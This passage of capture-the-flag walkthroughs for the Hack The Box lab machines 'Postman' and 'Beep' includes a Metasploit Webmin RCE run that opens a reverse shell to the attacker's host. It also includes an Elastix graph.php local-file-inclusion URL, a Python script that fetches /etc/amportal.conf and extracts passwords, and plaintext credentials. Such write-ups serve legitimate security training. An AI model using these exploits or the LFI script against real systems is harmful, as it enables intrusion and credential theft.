1g 0:00:00:06 DONE (2020-03-15 10:55) 0.1468g/s 2105Kp/s 2105Kc/s 2105KC/s a6_123..*7¡Vamos!
Session completed
Actually, apart from redis, only one user, “Matt”, is allowed to log in.
This time, we can't SSH in as Matt, but we can run the su command to become the user “Matt”.
redis@Postman:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$
The user.txt is in the home directory of user “Matt”.
Matt@Postman:~$ pwd
/home/Matt
Matt@Postman:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c
3. Getting Root
We still have one service that we haven't looked at yet: “Webmin httpd”.
For the privilege escalation, we can reuse the credential for Matt.
By trying it against Webmin, we can confirm that Matt's credential works for authentication.
Matt:computer2008
Also, we can search for vulnerabilities in Webmin 1.910 with searchsploit.
root@kali:~# searchsploit webmin
-------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | exploits/cgi/webapps/23535.txt
Webmin - Brute Force / Command Execution | exploits/multiple/remote/705.pl
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | exploits/linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation | exploits/linux/remote/21765.pl
Webmin 0.x - Code Input Validation | exploits/linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution | exploits/multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI) | exploits/multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | exploits/unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities | exploits/cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit) | exploits/cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution | exploits/linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) | exploits/linux/remote/47230.rb
Webmin 1.x - HTML Email Command Execution | exploits/cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) | exploits/multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | exploits/multiple/remote/2017.pl
phpMyWebmin 1.0 - 'target' Remote File Inclusion | exploits/php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | exploits/php/webapps/2451.txt
webmin 0.91 - Directory Traversal | exploits/cgi/remote/21183.txt
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
For Webmin 1.910, we have one matching vulnerability: “Webmin 1.910 - 'Package Updates' Remote Command Execution”.
Using the previous username and password, we can get a root shell.
Also, with the common Python pty trick, we can upgrade it to an interactive shell.
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.14.9
lhost => 10.10.14.9
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 10.10.14.9:4444
[+] Session cookie: 28319cb492d25d1493cbd8a83f732ca8
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.9:4444 -> 10.10.10.160:49658) at 2020-03-16 18:56:54 +0200
id
uid=0(root) gid=0(root) groups=0(root)
python -c "import pty;pty.spawn('/bin/bash')"
root@Postman:/usr/share/webmin/package-updates/#
As always, root.txt is in the directory “/root”.
root@Postman:~# pwd
pwd
/root
root@Postman:~# cat root.txt
cat root.txt
a257741c5bed8be7778c6ed95686ddce
root@Postman:~#
03 Mar 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Beep”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.7 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 09:55 EET
Nmap scan report for 10.10.10.7
Host is up (0.044s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL STLS EXPIRE(NEVER) APOP TOP IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING RESP-CODES USER LOGIN-DELAY(0)
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ATOMIC LITERAL+ CATENATE ANNOTATEMORE OK CHILDREN IDLE X-NETSCAPE MULTIAPPEND UIDPLUS ID MAILBOX-REFERRALS IMAP4rev1 NAMESPACE LIST-SUBSCRIBED LISTEXT URLAUTHA0001 CONDSTORE UNSELECT Completed SORT=MODSEQ THREAD=ORDEREDSUBJECT THREAD=REFERENCES BINARY SORT RIGHTS=kxte NO STARTTLS RENAME QUOTA IMAP4 ACL
443/tcp open ssl/https?
|_ssl-date: 2020-03-01T09:01:11+00:00; +1h02m01s from scanner time.
880/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1h02m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 382.63 seconds
root@kali:~#
Gobuster HTTP:
root@kali:~# gobuster dir -u http://10.10.10.7/ -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.7/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/03/01 10:04:30 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.7/23b3f8d9-6290-4f1e-85a5-9a8041a56e20 => 302. To force processing of Wildcard responses, specify the '--wildcard' switch
root@kali:~#
Gobuster HTTPS (port 80 answers every path with a 302 to https://10.10.10.7/, which is why the HTTP run aborted, so the scan is repeated against 443 with -k to skip TLS certificate verification):
root@kali:~# gobuster dir -u https://10.10.10.7/ -k -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @_FireFart_)
===============================================================
[ +] Url: https://10.10.10.7/
[ +] Threads: 10
[ +] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[ +] Status codes: 200,204,301,302,307,401,403
[ +] User Agent: gobuster/3.0.1
[ +] Extensions: php
[ +] Timeout: 10s
===============================================================
2020/03/01 10:12:31 Starting gobuster
===============================================================
/.hta ( Status: 403)
/.hta.php ( Status: 403)
/.htpasswd ( Status: 403)
/.htpasswd.php ( Status: 403)
/.htaccess ( Status: 403)
/.htaccess.php ( Status: 403)
/admin ( Status: 301)
/cgi-bin/ ( Status: 403)
/config.php ( Status: 200)
/configs ( Status: 301)
/favicon.ico ( Status: 200)
/help ( Status: 301)
/images ( Status: 301)
/index.php ( Status: 200)
/index.php ( Status: 200)
/lang ( Status: 301)
/libs ( Status: 301)
/mail ( Status: 301)
/modules ( Status: 301)
/panel ( Status: 301)
/register.php ( Status: 200)
/robots.txt ( Status: 200)
/static ( Status: 301)
/themes ( Status: 301)
/var ( Status: 301)
===============================================================
2020/03/01 10:15:22 Finished
===============================================================
root@kali:~#
2. Getting Root
On port 443 the site is an Elastix (FreePBX-based PBX) login page.
searchsploit lists the known exploits for Elastix:
root@kali:~# searchsploit elastix
----------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| ( /usr/share/exploitdb/)
----------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilit | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
----------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
This time, the useful entry is "Elastix 2.2.0 - 'graph.php' Local File Inclusion" (37637.pl).
The current_language parameter of vtigercrm/graph.php is used in a file include without sanitisation, so a directory traversal reads arbitrary files with the web server's privileges; the trailing %00 truncates the path so that whatever suffix the script appends is ignored. Requesting the following URL returns /etc/amportal.conf, the FreePBX configuration file that holds the Asterisk and database credentials:
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
Searching the returned file for the word "password" turns up the credential settings FreePBX keeps in amportal.conf.
The password is:
jEhdIekWmdjE
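As an added example (this is not code from the walkthrough or from the exploit itself), the following Python script builds the same graph.php LFI request and parses the returned amportal.conf for credential settings, instead of eyeballing a grep. The TARGET value and the sample file body are assumptions: the sample is a constructed amportal.conf, not a capture from the box.

```python
"""Added example (not part of the walkthrough): build the Elastix graph.php
LFI request from EDB-37637 and pull credentials out of the returned
/etc/amportal.conf. TARGET and the sample file body are assumptions."""
import re
import ssl
import urllib.parse
import urllib.request

TARGET = "https://10.10.10.7"        # assumed: the box's Elastix HTTPS interface
LFI_PATH = "/vtigercrm/graph.php"    # vulnerable script named in the exploit

# Constructed sample of an amportal.conf body, not captured from the box.
SAMPLE_AMPORTAL = """\
# This file is part of FreePBX.
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
"""

KEY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
SECRET_RE = re.compile(r"PASS|PASSWORD|SECRET", re.IGNORECASE)


def build_lfi_url(target: str, file_path: str, depth: int = 8) -> str:
    """Return the graph.php LFI URL that reads an absolute file path.

    current_language ends up in an include(): the ../ sequence walks out of
    the web root and the trailing NUL (%00) truncates whatever suffix the
    script appends, so the raw file is included and echoed back.
    """
    traversal = "../" * depth
    params = {
        "current_language": f"{traversal}/{file_path.lstrip('/')}\x00",
        "module": "Accounts",
    }
    # safe="/" keeps the traversal readable; the NUL becomes %00.
    query = urllib.parse.urlencode(params, safe="/") + "&action"
    return f"{target}{LFI_PATH}?{query}"


def extract_credentials(conf_text: str) -> dict:
    """Parse KEY=VALUE lines and keep the ones whose key names a secret.

    Comment lines, blank lines and any HTML the page wraps around the file
    are skipped: their 'keys' are not valid shell-style identifiers.
    """
    creds = {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip().strip("\"'")
        if KEY_RE.match(key) and SECRET_RE.search(key) and value:
            creds[key] = value
    return creds


def unique_passwords(creds: dict) -> list:
    """Distinct secret values in first-seen order: the SSH candidate list."""
    seen = []
    for value in creds.values():
        if value not in seen:
            seen.append(value)
    return seen


def fetch_via_lfi(target: str, file_path: str, timeout: int = 10) -> str:
    """Pull a file through the LFI. Certificate checking is switched off on
    purpose: the lab box is assumed to present a self-signed certificate."""
    ctx = ssl._create_unverified_context()
    url = build_lfi_url(target, file_path)
    with urllib.request.urlopen(url, context=ctx, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Offline run against the constructed sample; on the VPN, swap in
    # fetch_via_lfi(TARGET, "/etc/amportal.conf") instead.
    found = extract_credentials(SAMPLE_AMPORTAL)
    for key, value in found.items():
        print(f"{key} = {value}")
    print("candidates for ssh root@10.10.10.7:", unique_passwords(found))
```

Every value that unique_passwords() returns is worth trying against SSH and the Elastix web login; on this box they collapse to the single password shown above.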
The same password is reused for the root account, so it gets us straight in over SSH; password reuse between the PBX configuration and the OS account is the whole privilege escalation here.
As always, root.txt is in /root.
root@kali:~# ssh root@10.10.10.7
root@10.10.10.7's password:
Last login: Sun Mar 1 19:45:39 2020 from 10.10.14.27
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# cat /root/root.txt
d88e006123842106982acce0aaf453f0
[root@beep ~]#